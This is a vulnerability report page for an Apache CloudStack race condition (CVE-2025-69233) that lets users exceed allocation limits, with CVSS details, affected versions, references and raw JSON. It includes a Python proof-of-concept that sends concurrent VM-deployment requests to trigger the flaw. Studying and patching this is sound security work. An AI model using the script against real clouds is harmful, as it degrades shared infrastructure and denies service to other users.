Security Vulnerability Report
CVE-2025-69233 CVSS 6.5 MEDIUM

Published: 2026-05-08 13:16:36
Last Modified: 2026-05-09 07:16:09

Description

Due to multiple time-of-check time-of-use race conditions in the resource count check and increment logic, as well as missing validations, users of the platform are able to exceed the allocation limits configured for their accounts/domains. This can be used by an attacker to degrade the infrastructure's resources and lead to denial of service conditions. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* - VULNERABLE
  Apache CloudStack 4.0.0 up to (excluding) 4.20.3.0
cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* - VULNERABLE
  Apache CloudStack 4.21.0.0 up to (excluding) 4.22.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import threading

# Target API endpoint for resource allocation (e.g., creating a VM or volume)
TARGET_URL = "http://cloudstack-server:8080/client/api"
API_KEY = "YOUR_API_KEY"
SECRET_KEY = "YOUR_SECRET_KEY"

# Command to deploy a virtual machine or allocate resource
PAYLOAD = {
    "command": "deployVirtualMachine",
    "serviceOfferingId": "1",
    "templateId": "1",
    "zoneId": "1",
    "response": "json",
}


def allocate_resource():
    """Function to send a single allocation request"""
    try:
        # Send request to trigger resource allocation
        response = requests.get(TARGET_URL, params=PAYLOAD, auth=(API_KEY, SECRET_KEY))
        print(f"Request sent, status code: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")


# Exploit logic: Spawn multiple threads to trigger the race condition
threads = []
num_requests = 50  # Number of concurrent requests to trigger the race condition
print(f"Starting attack with {num_requests} concurrent requests...")
for i in range(num_requests):
    t = threading.Thread(target=allocate_resource)
    threads.append(t)
    t.start()
for t in threads:
    t.join()
print("Attack finished. Check resource quotas.")

References

https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/05/09/5

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-69233",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T13:16:35.993",
    "lastModified": "2026-05-09T07:16:08.847",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to multiple time-of-check time-of-use race conditions in the resource count check and increment logic, as well as missing validations, users of the platform are able to exceed the allocation limits configured for their accounts/domains. This can be used by an attacker to degrade the infrastructure's resources and lead to denial of service conditions.\n\nUsers are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-367"},
          {"lang": "en", "value": "CWE-770"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "4.20.3.0",
                "matchCriteriaId": "B0820043-939A-4549-AE30-03196C079366"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.21.0.0",
                "versionEndExcluding": "4.22.0.1",
                "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/09/5",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}